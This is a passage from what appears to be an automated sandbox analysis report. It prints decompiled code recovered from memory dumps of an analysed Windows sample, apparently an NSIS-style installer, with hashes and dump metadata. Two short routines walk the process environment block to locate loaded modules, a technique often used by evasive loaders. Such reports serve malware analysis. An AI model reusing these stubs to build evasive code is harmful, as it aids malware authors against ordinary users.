                                                                                                                                                                                                          					_t235 = _t234 - 1;
                                                                                                                                                                                                          					if(_t235 == 0) {
                                                                                                                                                                                                          						L21:
                                                                                                                                                                                                          						_t184 = _a4;
                                                                                                                                                                                                          						_t271 = 0;
                                                                                                                                                                                                          						do {
                                                                                                                                                                                                          							_t193 =  *_t184;
                                                                                                                                                                                                          							_t184 =  &(_t184[1]);
                                                                                                                                                                                                          							if(_t193 != _t168) {
                                                                                                                                                                                                          								_t232 = _t299 + _t193 * 4 - 0xb0;
                                                                                                                                                                                                          								_t236 =  *_t232;
                                                                                                                                                                                                          								 *((intOrPtr*)(0x42d6d0 + _t236 * 4)) = _t271;
                                                                                                                                                                                                          								 *_t232 = _t236 + 1;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							_t271 = _t271 + 1;
                                                                                                                                                                                                          						} while (_t271 < _a8);
                                                                                                                                                                                                          						_v16 = _v16 | 0xffffffff;
                                                                                                                                                                                                          						_v40 = _v40 & 0x00000000;
                                                                                                                                                                                                          						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
                                                                                                                                                                                                          						_t195 = _v8;
                                                                                                                                                                                                          						_t186 =  ~_a28;
                                                                                                                                                                                                          						_v12 = _t168;
                                                                                                                                                                                                          						_v180 = _t168;
                                                                                                                                                                                                          						_v36 = 0x42d6d0;
                                                                                                                                                                                                          						_v240 = _t168;
                                                                                                                                                                                                          						if(_t195 > _v28) {
                                                                                                                                                                                                          							L62:
                                                                                                                                                                                                          							_t168 = 0;
                                                                                                                                                                                                          							if(_v52 == 0 || _v28 == 1) {
                                                                                                                                                                                                          								return _t168;
                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                          								goto L64;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_v44 = _t195 - 1;
                                                                                                                                                                                                          						_v32 = _t299 + _t195 * 4 - 0x70;
                                                                                                                                                                                                          						do {
                                                                                                                                                                                                          							_t282 =  *_v32;
                                                                                                                                                                                                          							if(_t282 == 0) {
                                                                                                                                                                                                          								goto L61;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							while(1) {
                                                                                                                                                                                                          								_t283 = _t282 - 1;
                                                                                                                                                                                                          								_t200 = _a28 + _t186;
                                                                                                                                                                                                          								_v48 = _t283;
                                                                                                                                                                                                          								_v24 = _t200;
                                                                                                                                                                                                          								if(_v8 <= _t200) {
                                                                                                                                                                                                          									goto L45;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								L31:
                                                                                                                                                                                                          								_v20 = _t283 + 1;
                                                                                                                                                                                                          								do {
                                                                                                                                                                                                          									_v16 = _v16 + 1;
                                                                                                                                                                                                          									_t296 = _v28 - _v24;
                                                                                                                                                                                                          									if(_t296 > _a28) {
                                                                                                                                                                                                          										_t296 = _a28;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									_t222 = _v8 - _v24;
                                                                                                                                                                                                          									_t254 = 1 << _t222;
                                                                                                                                                                                                          									if(1 <= _v20) {
                                                                                                                                                                                                          										L40:
                                                                                                                                                                                                          										_t256 =  *_a36;
                                                                                                                                                                                                          										_t168 = 1 << _t222;
                                                                                                                                                                                                          										_v40 = 1;
                                                                                                                                                                                                          										_t274 = _t256 + 1;
                                                                                                                                                                                                          										if(_t274 > 0x5a0) {
                                                                                                                                                                                                          											goto L64;
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                          										_t275 = _v32;
                                                                                                                                                                                                          										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
                                                                                                                                                                                                          										if(_t222 >= _t296) {
                                                                                                                                                                                                          											goto L40;
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          										while(1) {
                                                                                                                                                                                                          											_t222 = _t222 + 1;
                                                                                                                                                                                                          											if(_t222 >= _t296) {
                                                                                                                                                                                                          												goto L40;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          											_t275 = _t275 + 4;
                                                                                                                                                                                                          											_t264 = _t263 + _t263;
                                                                                                                                                                                                          											_t175 =  *_t275;
                                                                                                                                                                                                          											if(_t264 <= _t175) {
                                                                                                                                                                                                          												goto L40;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          											_t263 = _t264 - _t175;
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          										goto L40;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									_t168 = _a32 + _t256 * 4;
                                                                                                                                                                                                          									_t297 = _t299 + _v16 * 4 - 0xec;
                                                                                                                                                                                                          									 *_a36 = _t274;
                                                                                                                                                                                                          									_t259 = _v16;
                                                                                                                                                                                                          									 *_t297 = _t168;
                                                                                                                                                                                                          									if(_t259 == 0) {
                                                                                                                                                                                                          										 *_a24 = _t168;
                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                          										_t276 = _v12;
                                                                                                                                                                                                          										_t298 =  *((intOrPtr*)(_t297 - 4));
                                                                                                                                                                                                          										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
                                                                                                                                                                                                          										_a5 = _a28;
                                                                                                                                                                                                          										_a4 = _t222;
                                                                                                                                                                                                          										_t262 = _t276 >> _t186;
                                                                                                                                                                                                          										_a6 = (_t168 - _t298 >> 2) - _t262;
                                                                                                                                                                                                          										 *(_t298 + _t262 * 4) = _a4;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									_t224 = _v24;
                                                                                                                                                                                                          									_t186 = _t224;
                                                                                                                                                                                                          									_t225 = _t224 + _a28;
                                                                                                                                                                                                          									_v24 = _t225;
                                                                                                                                                                                                          								} while (_v8 > _t225);
                                                                                                                                                                                                          								L45:
                                                                                                                                                                                                          								_t284 = _v36;
                                                                                                                                                                                                          								_a5 = _v8 - _t186;
                                                                                                                                                                                                          								if(_t284 < 0x42d6d0 + _a8 * 4) {
                                                                                                                                                                                                          									_t205 =  *_t284;
                                                                                                                                                                                                          									if(_t205 >= _a12) {
                                                                                                                                                                                                          										_t207 = _t205 - _a12 + _t205 - _a12;
                                                                                                                                                                                                          										_v36 =  &(_v36[1]);
                                                                                                                                                                                                          										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
                                                                                                                                                                                                          										_t208 =  *((intOrPtr*)(_t207 + _a16));
                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                          										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
                                                                                                                                                                                                          										_t208 =  *_t284;
                                                                                                                                                                                                          										_v36 =  &(_t284[1]);
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									_a6 = _t208;
                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                          									_a4 = 0xc0;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								_t286 = 1 << _v8 - _t186;
                                                                                                                                                                                                          								_t244 = _v12 >> _t186;
                                                                                                                                                                                                          								while(_t244 < _v40) {
                                                                                                                                                                                                          									 *(_t168 + _t244 * 4) = _a4;
                                                                                                                                                                                                          									_t244 = _t244 + _t286;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								_t287 = _v12;
                                                                                                                                                                                                          								_t246 = 1 << _v44;
                                                                                                                                                                                                          								while((_t287 & _t246) != 0) {
                                                                                                                                                                                                          									_t287 = _t287 ^ _t246;
                                                                                                                                                                                                          									_t246 = _t246 >> 1;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								_t288 = _t287 ^ _t246;
                                                                                                                                                                                                          								_v20 = 1;
                                                                                                                                                                                                          								_v12 = _t288;
                                                                                                                                                                                                          								_t251 = _v16;
                                                                                                                                                                                                          								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
                                                                                                                                                                                                          									L60:
                                                                                                                                                                                                          									if(_v48 != 0) {
                                                                                                                                                                                                          										_t282 = _v48;
                                                                                                                                                                                                          										_t283 = _t282 - 1;
                                                                                                                                                                                                          										_t200 = _a28 + _t186;
                                                                                                                                                                                                          										_v48 = _t283;
                                                                                                                                                                                                          										_v24 = _t200;
                                                                                                                                                                                                          										if(_v8 <= _t200) {
                                                                                                                                                                                                          											goto L45;
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          										goto L31;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									break;
                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                          									goto L58;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								do {
                                                                                                                                                                                                          									L58:
                                                                                                                                                                                                          									_t186 = _t186 - _a28;
                                                                                                                                                                                                          									_t251 = _t251 - 1;
                                                                                                                                                                                                          								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
                                                                                                                                                                                                          								_v16 = _t251;
                                                                                                                                                                                                          								goto L60;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							L61:
                                                                                                                                                                                                          							_v8 = _v8 + 1;
                                                                                                                                                                                                          							_v32 = _v32 + 4;
                                                                                                                                                                                                          							_v44 = _v44 + 1;
                                                                                                                                                                                                          						} while (_v8 <= _v28);
                                                                                                                                                                                                          						goto L62;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_t277 = 0;
                                                                                                                                                                                                          					do {
                                                                                                                                                                                                          						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
                                                                                                                                                                                                          						_t277 = _t277 + 4;
                                                                                                                                                                                                          						_t235 = _t235 - 1;
                                                                                                                                                                                                          						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
                                                                                                                                                                                                          					} while (_t235 != 0);
                                                                                                                                                                                                          					goto L21;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				 *_a24 =  *_a24 & 0x00000000;
                                                                                                                                                                                                          				 *_a28 =  *_a28 & 0x00000000;
                                                                                                                                                                                                          				return 0;
                                                                                                                                                                                                          			}











































































                                                                                                                                                                                                          0x004073b7
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x004073c2
                                                                                                                                                                                                          0x004073c5
                                                                                                                                                                                                          0x004073c6
                                                                                                                                                                                                          0x004073c8
                                                                                                                                                                                                          0x004073ce
                                                                                                                                                                                                          0x004073d1
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x004073d7
                                                                                                                                                                                                          0x004073d8
                                                                                                                                                                                                          0x004073db
                                                                                                                                                                                                          0x004073de
                                                                                                                                                                                                          0x004073e1
                                                                                                                                                                                                          0x004073e7
                                                                                                                                                                                                          0x004073e9
                                                                                                                                                                                                          0x004073e9
                                                                                                                                                                                                          0x004073f1
                                                                                                                                                                                                          0x004073f5
                                                                                                                                                                                                          0x004073fa
                                                                                                                                                                                                          0x0040741f
                                                                                                                                                                                                          0x00407425
                                                                                                                                                                                                          0x00407427
                                                                                                                                                                                                          0x00407429
                                                                                                                                                                                                          0x0040742c
                                                                                                                                                                                                          0x00407435
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x004073fc
                                                                                                                                                                                                          0x004073fc
                                                                                                                                                                                                          0x00407405
                                                                                                                                                                                                          0x00407409
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040741a
                                                                                                                                                                                                          0x0040741a
                                                                                                                                                                                                          0x0040741d
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040740d
                                                                                                                                                                                                          0x00407410
                                                                                                                                                                                                          0x00407412
                                                                                                                                                                                                          0x00407416
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00407418
                                                                                                                                                                                                          0x00407418
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040741a
                                                                                                                                                                                                          0x0040743e
                                                                                                                                                                                                          0x00407444
                                                                                                                                                                                                          0x0040744e
                                                                                                                                                                                                          0x00407450
                                                                                                                                                                                                          0x00407455
                                                                                                                                                                                                          0x00407457
                                                                                                                                                                                                          0x0040748d
                                                                                                                                                                                                          0x00407459
                                                                                                                                                                                                          0x00407459
                                                                                                                                                                                                          0x0040745c
                                                                                                                                                                                                          0x0040745f
                                                                                                                                                                                                          0x00407469
                                                                                                                                                                                                          0x0040746c
                                                                                                                                                                                                          0x00407473
                                                                                                                                                                                                          0x0040747e
                                                                                                                                                                                                          0x00407485
                                                                                                                                                                                                          0x00407485
                                                                                                                                                                                                          0x0040748f
                                                                                                                                                                                                          0x00407492
                                                                                                                                                                                                          0x00407494
                                                                                                                                                                                                          0x0040749a
                                                                                                                                                                                                          0x0040749a
                                                                                                                                                                                                          0x004074a3
                                                                                                                                                                                                          0x004074a6
                                                                                                                                                                                                          0x004074ab
                                                                                                                                                                                                          0x004074ba
                                                                                                                                                                                                          0x004074c2
                                                                                                                                                                                                          0x004074c7
                                                                                                                                                                                                          0x004074eb
                                                                                                                                                                                                          0x004074f3
                                                                                                                                                                                                          0x004074f7
                                                                                                                                                                                                          0x004074fd
                                                                                                                                                                                                          0x004074c9
                                                                                                                                                                                                          0x004074d7
                                                                                                                                                                                                          0x004074da
                                                                                                                                                                                                          0x004074e0
                                                                                                                                                                                                          0x004074e0
                                                                                                                                                                                                          0x00407501
                                                                                                                                                                                                          0x004074bc
                                                                                                                                                                                                          0x004074bc
                                                                                                                                                                                                          0x004074bc
                                                                                                                                                                                                          0x00407512
                                                                                                                                                                                                          0x00407516
                                                                                                                                                                                                          0x00407522
                                                                                                                                                                                                          0x0040751d
                                                                                                                                                                                                          0x00407520
                                                                                                                                                                                                          0x00407520
                                                                                                                                                                                                          0x0040752a
                                                                                                                                                                                                          0x0040752f
                                                                                                                                                                                                          0x00407537
                                                                                                                                                                                                          0x00407533
                                                                                                                                                                                                          0x00407535
                                                                                                                                                                                                          0x00407535
                                                                                                                                                                                                          0x0040753d
                                                                                                                                                                                                          0x0040753f
                                                                                                                                                                                                          0x00407546
                                                                                                                                                                                                          0x00407550
                                                                                                                                                                                                          0x0040755a
                                                                                                                                                                                                          0x00407576
                                                                                                                                                                                                          0x0040757a
                                                                                                                                                                                                          0x004073bf
                                                                                                                                                                                                          0x004073c5
                                                                                                                                                                                                          0x004073c6
                                                                                                                                                                                                          0x004073c8
                                                                                                                                                                                                          0x004073ce
                                                                                                                                                                                                          0x004073d1
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x004073d1
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040755c
                                                                                                                                                                                                          0x0040755c
                                                                                                                                                                                                          0x0040755c
                                                                                                                                                                                                          0x00407561
                                                                                                                                                                                                          0x0040756a
                                                                                                                                                                                                          0x00407573

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165547451.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165572222.0000000000408000.00000002.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165607422.000000000041D000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165615181.000000000042C000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165621749.0000000000435000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165630933.0000000000438000.00000002.00020000.sdmp
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: e205b8326ae89ea7e41b2cb83266b2effedd335e5b54ad7d386a065d8ff2d5ef
                                                                                                                                                                                                          • Instruction ID: 0a9d7053db9648894e52107a0598598bb6c65082166a45c8961a79b8daba83ed
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e205b8326ae89ea7e41b2cb83266b2effedd335e5b54ad7d386a065d8ff2d5ef
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7AC13831E042199BCF18CF68D8905EEBBB2BF99314F25826AD85677380D734A942CF95
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E722F478F(void* __eflags, intOrPtr* _a4) {
                                                                                                                                                                                                          				intOrPtr* _v8;
                                                                                                                                                                                                          				intOrPtr _v12;
                                                                                                                                                                                                          				intOrPtr _v16;
                                                                                                                                                                                                          				intOrPtr _v20;
                                                                                                                                                                                                          				signed int _t35;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_v16 =  *[fs:0x30];
                                                                                                                                                                                                          				_v12 =  *((intOrPtr*)(_v16 + 0xc));
                                                                                                                                                                                                          				_v20 =  *((intOrPtr*)(_v12 + 0xc));
                                                                                                                                                                                                          				_v8 =  *((intOrPtr*)(_v12 + 0xc));
                                                                                                                                                                                                          				while(E722F46D3(_t35,  *((intOrPtr*)(_v8 + 0x30)), _a4) != 0) {
                                                                                                                                                                                                          					_v8 =  *_v8;
                                                                                                                                                                                                          					if(_v8 != _v20) {
                                                                                                                                                                                                          						continue;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				return  *((intOrPtr*)(_v8 + 0x28));
                                                                                                                                                                                                          			}









                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2167863165.00000000722F3000.00000040.00020000.sdmp, Offset: 722F0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2167849303.00000000722F0000.00000002.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2167854070.00000000722F1000.00000080.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2167858720.00000000722F2000.00000002.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2167867973.00000000722F5000.00000002.00020000.sdmp
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 3a60233801de0e8d64e4fc61689fdab8e9d3162a2ace7c33a53d9f49bfda1752
                                                                                                                                                                                                          • Instruction ID: b9dba4b9d3425fee707ce9304fa816247cf8dd0826b209feb6c0f078cc711074
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3a60233801de0e8d64e4fc61689fdab8e9d3162a2ace7c33a53d9f49bfda1752
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 16010C78A11209EFCB41DF99C580E9DFBF5EB09220B118595E915E7715E370EE50DB40
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E722F458C() {
                                                                                                                                                                                                          
                                                                                                                                                                                                          				return  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18));
                                                                                                                                                                                                          			}




                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2167863165.00000000722F3000.00000040.00020000.sdmp, Offset: 722F0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2167849303.00000000722F0000.00000002.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2167854070.00000000722F1000.00000080.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2167858720.00000000722F2000.00000002.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2167867973.00000000722F5000.00000002.00020000.sdmp
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
                                                                                                                                                                                                          • Instruction ID: 58c6f5837427d6eca2c2deaad74ce6c6656098581891570576efec04afcca601
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 42D001392A1A48CFC241CF4CD084E40B3F8FB0DA20B068092FA0A8BB32C334FC00DA80
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 96%
                                                                                                                                                                                                          			E00404CD6(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
                                                                                                                                                                                                          				struct HWND__* _v8;
                                                                                                                                                                                                          				struct HWND__* _v12;
                                                                                                                                                                                                          				long _v16;
                                                                                                                                                                                                          				signed int _v20;
                                                                                                                                                                                                          				signed int _v24;
                                                                                                                                                                                                          				intOrPtr _v28;
                                                                                                                                                                                                          				signed char* _v32;
                                                                                                                                                                                                          				int _v36;
                                                                                                                                                                                                          				signed int _v44;
                                                                                                                                                                                                          				int _v48;
                                                                                                                                                                                                          				signed int* _v60;
                                                                                                                                                                                                          				signed char* _v64;
                                                                                                                                                                                                          				signed int _v68;
                                                                                                                                                                                                          				long _v72;
                                                                                                                                                                                                          				void* _v76;
                                                                                                                                                                                                          				intOrPtr _v80;
                                                                                                                                                                                                          				intOrPtr _v84;
                                                                                                                                                                                                          				void* _v88;
                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                          				signed int _t203;
				intOrPtr _t206;
				intOrPtr _t207;
				long _t212;
				signed int _t216;
				signed int _t227;
				void* _t230;
				void* _t231;
				int _t237;
				long _t242;
				long _t243;
				signed int _t244;
				signed int _t250;
				signed int _t252;
				signed char _t253;
				signed char _t259;
				void* _t264;
				void* _t266;
				signed char* _t284;
				signed char _t285;
				long _t290;
				signed int _t300;
				signed int _t308;
				signed char* _t316;
				int _t320;
				int _t321;
				signed int* _t322;
				int _t323;
				long _t324;
				signed int _t325;
				long _t327;
				int _t328;
				signed int _t329;
				void* _t331;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_v8 = GetDlgItem(_a4, 0x408);
				_t331 = SendMessageA;
				_v24 =  *0x42f488;
				_v28 =  *0x42f454 + 0x94;
				_t320 = 0x10;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t298 = _a16;
					} else {
						_a12 = 0;
						_t298 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t298;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t298 + 4)) == 0x408) {
							if(( *0x42f45d & 0x00000002) != 0) {
								L41:
								if(_v16 != 0) {
									_t242 = _v16;
									if( *((intOrPtr*)(_t242 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, 0,  *(_t242 + 0x5c));
									}
									_t243 = _v16;
									if( *((intOrPtr*)(_t243 + 8)) == 0xfffffe6a) {
										_t298 = _v24;
										_t244 =  *(_t243 + 0x5c);
										if( *((intOrPtr*)(_t243 + 0xc)) != 2) {
											 *(_t244 * 0x418 + _t298 + 8) =  *(_t244 * 0x418 + _t298 + 8) & 0xffffffdf;
										} else {
											 *(_t244 * 0x418 + _t298 + 8) =  *(_t244 * 0x418 + _t298 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t298 = 0 | _a8 != 0x00000413;
								_t250 = E00404C24(_v8, _a8 != 0x413);
								_t325 = _t250;
								if(_t325 >= 0) {
									_t99 = _v24 + 8; // 0x8
									_t298 = _t250 * 0x418 + _t99;
									_t252 =  *_t298;
									if((_t252 & 0x00000010) == 0) {
										if((_t252 & 0x00000040) == 0) {
											_t253 = _t252 ^ 0x00000001;
										} else {
											_t259 = _t252 ^ 0x00000080;
											if(_t259 >= 0) {
												_t253 = _t259 & 0x000000fe;
											} else {
												_t253 = _t259 | 0x00000001;
											}
										}
										 *_t298 = _t253;
										E0040117D(_t325);
										_a12 = _t325 + 1;
										_a16 =  !( *0x42f45c) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t298 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageA(_v8, 0x200, 0, 0);
							}
							if(_a8 == 0x40b) {
								_t230 =  *0x42a89c;
								if(_t230 != 0) {
									ImageList_Destroy(_t230);
								}
								_t231 =  *0x42a8b0;
								if(_t231 != 0) {
									GlobalFree(_t231);
								}
								 *0x42a89c = 0;
								 *0x42a8b0 = 0;
								 *0x42f4c0 = 0;
							}
							if(_a8 != 0x40f) {
								L90:
								if(_a8 == 0x420 && ( *0x42f45d & 0x00000001) != 0) {
									_t321 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t321);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t321);
								}
								goto L93;
							} else {
								E004011EF(_t298, 0, 0);
								_t203 = _a12;
								if(_t203 != 0) {
									if(_t203 != 0xffffffff) {
										_t203 = _t203 - 1;
									}
									_push(_t203);
									_push(8);
									E00404CA4();
								}
								if(_a16 == 0) {
									L75:
									E004011EF(_t298, 0, 0);
									_v36 =  *0x42a8b0;
									_t206 =  *0x42f488;
									_v64 = 0xf030;
									_v24 = 0;
									if( *0x42f48c <= 0) {
										L86:
										if( *0x42f44c == 4) {
											InvalidateRect(_v8, 0, 1);
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          										_t207 =  *0x42ec1c; // 0x590f48
                                                                                                                                                                                                          										if( *((intOrPtr*)(_t207 + 0x10)) != 0) {
                                                                                                                                                                                                          											E00404BDF(0x3ff, 0xfffffffb, E00404BF7(5));
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          										goto L90;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									_t322 = _t206 + 8;
                                                                                                                                                                                                          									do {
                                                                                                                                                                                                          										_t212 =  *((intOrPtr*)(_v36 + _v24 * 4));
                                                                                                                                                                                                          										if(_t212 != 0) {
                                                                                                                                                                                                          											_t300 =  *_t322;
                                                                                                                                                                                                          											_v72 = _t212;
                                                                                                                                                                                                          											_v76 = 8;
                                                                                                                                                                                                          											if((_t300 & 0x00000001) != 0) {
                                                                                                                                                                                                          												_v76 = 9;
                                                                                                                                                                                                          												_v60 =  &(_t322[4]);
                                                                                                                                                                                                          												_t322[0] = _t322[0] & 0x000000fe;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          											if((_t300 & 0x00000040) == 0) {
                                                                                                                                                                                                          												_t216 = (_t300 & 0x00000001) + 1;
                                                                                                                                                                                                          												if((_t300 & 0x00000010) != 0) {
                                                                                                                                                                                                          													_t216 = _t216 + 3;
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          											} else {
                                                                                                                                                                                                          												_t216 = 3;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          											_v68 = (_t216 << 0x0000000b | _t300 & 0x00000008) + (_t216 << 0x0000000b | _t300 & 0x00000008) | _t300 & 0x00000020;
                                                                                                                                                                                                          											SendMessageA(_v8, 0x1102, (_t300 >> 0x00000005 & 0x00000001) + 1, _v72);
                                                                                                                                                                                                          											SendMessageA(_v8, 0x110d, 0,  &_v76);
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          										_v24 = _v24 + 1;
                                                                                                                                                                                                          										_t322 =  &(_t322[0x106]);
                                                                                                                                                                                                          									} while (_v24 <  *0x42f48c);
                                                                                                                                                                                                          									goto L86;
                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                          									_t323 = E004012E2( *0x42a8b0);
                                                                                                                                                                                                          									E00401299(_t323);
                                                                                                                                                                                                          									_t227 = 0;
                                                                                                                                                                                                          									_t298 = 0;
                                                                                                                                                                                                          									if(_t323 <= 0) {
                                                                                                                                                                                                          										L74:
                                                                                                                                                                                                          										SendMessageA(_v12, 0x14e, _t298, 0);
                                                                                                                                                                                                          										_a16 = _t323;
                                                                                                                                                                                                          										_a8 = 0x420;
                                                                                                                                                                                                          										goto L75;
                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                          										goto L71;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									do {
                                                                                                                                                                                                          										L71:
                                                                                                                                                                                                          										if( *((intOrPtr*)(_v28 + _t227 * 4)) != 0) {
                                                                                                                                                                                                          											_t298 = _t298 + 1;
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          										_t227 = _t227 + 1;
                                                                                                                                                                                                          									} while (_t227 < _t323);
                                                                                                                                                                                                          									goto L74;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
                                                                                                                                                                                                          							goto L93;
                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                          							_t237 = SendMessageA(_v12, 0x147, 0, 0);
